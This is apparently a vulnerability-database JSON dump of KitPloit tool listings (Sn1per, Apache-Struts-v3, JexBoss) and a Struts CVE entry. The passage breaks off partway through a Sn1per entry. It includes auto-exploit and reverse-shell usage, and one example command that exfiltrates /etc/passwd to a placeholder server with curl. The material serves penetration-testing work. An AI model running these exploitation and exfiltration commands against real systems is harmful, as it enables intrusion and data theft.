released\r\n\r\n# Mitigate unsafe deserialization risk with lgtm #\r\n\r\nlgtm runs the standard Deserialization of user-controlled data query on all Java projects. If your project uses deserialization frameworks detected by that query, and has user-controlled data reaching a deserialization method, you may see relevant alerts for this query on lgtm.com. Check any results carefully. You can also enable lgtm's pull request integration to prevent serious security issues like these from being merged into the code base in the first place.\r\n\r\nIf your project uses other deserialization frameworks, then you can use the query console to create your own custom version of the standard query.", "cvss3": {}, "published": "2017-09-06T00:00:00", "type": "seebug", "title": "Apache Struts2 S2-052 (CVE-2017-9805)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-9805"], "modified": "2017-09-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96420", "id": "SSV:96420", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kitploit": [{"lastseen": "2023-07-04T12:36:49", "description": "[](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ).\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n**Detailed host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n**NMap HTML host reports** \n \n\n\n[](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n**Takeovers and Email Security** \n \n\n\n[](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n**HTML5 Notepad** \n \n\n\n[](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n**ORDER SN1PER PROFESSIONAL:** \nTo obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ). \n \n**DEMO VIDEO:** \n \n \n\n\n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**EXPLOITS:** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003\n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts\n * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002\n * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561\n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n * Apache Tomcat: Remote Code Execution (CVE-2017-12617)\n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269\n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249\n * Shellshock Bash Shell remote code execution CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)\n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843\n * MS08-067 Microsoft Server Service Relative Path Stack Corruption\n * Webmin File Disclosure CVE-2006-3392\n * VsFTPd 2.3.4 Backdoor\n * ProFTPd 1.3.3C Backdoor\n * MS03-026 Microsoft RPC DCOM Interface Overflow\n * DistCC Daemon Command Execution\n * JBoss Java De-Serialization\n * HTTP Writable Path PUT/DELETE File Access\n * Apache Tomcat User Enumeration\n * Tomcat Application Manager Login Bruteforce\n * Jenkins-CI Enumeration\n * HTTP WebDAV Scanner\n * Android Insecure ADB\n * Anonymous FTP Access\n * PHPMyAdmin Backdoor\n * PHPMyAdmin Auth Bypass\n * OpenSSH User Enumeration\n * LibSSH Auth Bypass\n * SMTP User Enumeration\n * Public NFS Mounts\n \n**KALI LINUX INSTALL:** \n\n \n \n bash install.sh\n\n \n**UBUNTU/DEBIAN/PARROT INSTALL:** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n**DOCKER INSTALL:** \n\n \n \n docker build Dockerfile\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per](<https://github.com/1N3/Sn1per> \"Download Sn1per\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-12T13:09:00", "type": "kitploit", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"], "modified": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:18:09", "description": " \n\n\n[](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nScript contains the fusion of 3 RCE vulnerabilities on ApacheStruts, it also has the ability to create server shells. \n \n**SHELL** \n**php** `finished` \n**jsp** `process` \n \n**CVE ADD** \n**CVE-2013-2251** `'action:', 'redirect:' and 'redirectAction'` \n**CVE-2017-5638** `Content-Type` \n**CVE-2018-11776** `'redirect:' and 'redirectAction'` \n \n \n\n\n**[Download Apache-Struts-v3](<https://github.com/s1kr10s/Apache-Struts-v3>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-26T21:14:00", "type": "kitploit", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-08-26T21:14:01", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:18:52", "description": "JexBoss is a tool for testing and exploiting [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc. \n \n**Requirements** \n\n\n * Python >= 2.7.x\n * [urllib3](<https://pypi.python.org/pypi/urllib3>)\n * [ipaddress](<https://pypi.python.org/pypi/ipaddress>)\n \n**Installation on Linux\\Mac** \nTo install the latest version of JexBoss, please use the following commands: \n\n \n \n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n OR:\n \n Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip\n unzip master.zip\n cd jexboss-master\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n\nIf you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl: \n\n \n \n yum -y install centos-release-scl\n yum -y install python27\n scl enable python27 bash\n\n \n**Installation on Windows** \nIf you are using Windows, you can use the [Git Bash](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>) to run the JexBoss. Follow the steps below: \n\n\n * Download and install [Python](<https://www.python.org/downloads/release/python-2712/>)\n * Download and install [Git for Windows](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>)\n * After installing, run the Git for Windows and type the following commands:\n \n \n PATH=$PATH:C:\\Python27\\\n PATH=$PATH:C:\\Python27\\Scripts\n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n\n \n**Features** \nThe tool and [exploits](<https://www.kitploit.com/search/label/Exploits>) were developed and tested for: \n\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)\nThe exploitation vectors are: \n\n\n * /admin-console\n * tested and working in JBoss versions 5 and 6\n * /jmx-console\n * tested and working in JBoss versions 4, 5 and 6\n * /web-console/Invoker\n * tested and working in JBoss versions 4, 5 and 6\n * /invoker/JMXInvokerServlet\n * tested and working in JBoss versions 4, 5 and 6\n * Application Deserialization\n * tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters\n * Servlet Deserialization\n * tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an \"Invoker\" in a link)\n * Apache Struts2 CVE-2017-5638\n * tested in [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 applications\n * Others\n \n**Videos** \n\n\n * Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss\n\n \n\n\n * Exploiting JBoss Application Server with JexBoss\n\n \n\n\n * Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)\n\n \n \n**Screenshots** \n\n\n * Simple usage examples:\n \n \n $ python jexboss.py\n\n \n\n\n[](<https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s1600/jexboss_4_simple_usage_help.png>)\n\n \n\n\n * Example of standalone mode against JBoss:\n \n \n $ python jexboss.py -u http://192.168.0.26:8080\n\n \n\n\n[](<https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s1600/jexboss_5_standalone_mode1.png>)\n\n \n\n\n[](<https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s1600/jexboss_6_standalone_mode2.png>)\n\n * Usage modes:\n \n \n $ python jexboss.py -h\n\n * Network scan mode:\n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[](<https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s1600/jexboss_7_network_scan_mode.png>)\n\n \n\n\n * Network scan with auto-exploit mode:\n \n \n $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[](<https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s1600/jexboss_8_scan_with_auto_exploit_mode.png>)\n\n \n\n\n * Results and recommendations:\n\n[](<https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s1600/jexboss_9_results_and_recommendations2.png>)\n\n \n \n**Reverse Shell (meterpreter integration)** \nAfter you exploit a JBoss server, you can use the own [jexboss](<https://www.kitploit.com/search/label/JexBoss>) command shell or perform a reverse connection using the following command: \n\n \n \n jexremote=YOUR_IP:YOUR_PORT\n \n Example:\n Shell>jexremote=192.168.0.10:4444\n\n * Example: [](<https://github.com/joaomatosf/jexboss/raw/master/screenshots/jexbossreverse2.jpg>)\n\n[](<https://4.bp.blogspot.com/-DTLzz6fknAc/Wi9wlav0sMI/AAAAAAAAJpQ/Au8e57VCaooIR0iX0fH3qqPHYZvsrDHoQCLcBGAs/s1600/jexboss_10_jexbossreverse2.jpeg>)\n\n \n\n\nWhen exploiting java deserialization [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute. \n \n**Usage examples** \n\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:\n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):\n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name\n\n * For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n \n \n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n\n * For [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638)\n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2\n\n * For [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638) with [cookies](<https://www.kitploit.com/search/label/Cookies>) for authenticated resources\n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"\n\n * Auto scan mode:\n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log\n\n * File scan mode:\n \n \n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n\n * More Options:\n \n \n optional arguments:\n -h, --help show this help message and exit\n --version show program's version number and exit\n --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE\n PERMISSION!!!)\n --disable-check-updates, -D\n Disable two updates checks: 1) Check for updates\n performed by the webshell in exploited server at\n http://webshell.jexboss.net/jsp_version.txt and 2)\n check for updates performed by the jexboss client at\n http://joaomatosf.com/rnp/releases.txt\n -mode {standalone,auto-scan,file-scan}\n Operation mode (DEFAULT: standalone)\n --app-unserialize, -j\n Check for java unserialization vulnerabilities in HTTP\n parameters (eg. javax.faces.ViewState, oldFormData,\n etc)\n --servlet-unserialize, -l\n Check for java unserialization vulnerabilities in\n Servlets (like Invoker interfaces)\n --jboss Check only for JBOSS vectors.\n --jenkins Check only for Jenkins CLI vector.\n --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat\n (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be\n checked by default.\n --proxy PROXY, -P PROXY\n Use a http proxy to connect to the target URL (eg. -P\n http://192.168.0.1:3128)\n --proxy-cred LOGIN:PASS, -L LOGIN:PASS\n Proxy authentication credentials (eg -L name:password)\n --jboss-login LOGIN:PASS, -J LOGIN:PASS\n JBoss login and password for exploit admin-console in\n JBoss 5 and JBoss 6 (default: admin:admin)\n --timeout TIMEOUT Seconds to wait before timeout connection (default 3)\n \n Standalone mode:\n -host HOST, -u HOST Host address to be checked (eg. -u\n http://192.168.0.10:8080)\n \n Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):\n --reverse-host RHOST:RPORT, -r RHOST:RPORT\n Remote host address and port for reverse shell when\n exploiting Java Deserialization Vulnerabilities in\n application layer (for now, working only against *nix\n systems)(eg. 192.168.0.10:1331)\n --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d\n @/etc/passwd http://your_server)\n --windows, -w Specifies that the commands are for rWINDOWS System$\n (cmd.exe)\n --post-parameter PARAMETER, -H PARAMETER\n Specify the parameter to find and inject serialized\n objects into it. (egs. -H javax.faces.ViewState or -H\n oldFormData (<- Hi PayPal =X) or others) (DEFAULT:\n javax.faces.ViewState)\n --show-payload, -t Print the generated payload.\n --gadget {commons-collections3.1,commons-collections4.0,groovy1}\n Specify the type of Gadget to generate the payload\n automatically. (DEFAULT: commons-collections3.1 or\n groovy1 for JenKins)\n --load-gadget FILENAME\n Provide your own gadget from file (a java serialized\n object in RAW mode)\n --force, -F Force send java serialized gadgets to URL informed in\n -u parameter. This will send the payload in multiple\n formats (eg. RAW, GZIPED and BASE64) and with\n different Content-Types.\n \n Auto scan mode:\n -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)\n -ports PORTS List of ports separated by commas to be checked for\n each host (eg. 8080,8443,8888,80,443)\n -results FILENAME File name to store the auto scan results\n \n File scan mode:\n -file FILENAME_HOSTS Filename with host list to be scanned (one host per\n line)\n -out FILENAME_RESULTS\n File name to store the file scan results\n \n\n \n \n\n\n**[Download JexBoss](<https://github.com/joaomatosf/jexboss>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-12-18T21:12:00", "type": "kitploit", "title": "JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2016-8735", "CVE-2017-5638"], "modified": "2017-12-18T21:14:35", "id": "KITPLOIT:5230099254245458698", "href": "http://www.kitploit.com/2017/12/jexboss-jboss-and-others-java.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:18:18", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n 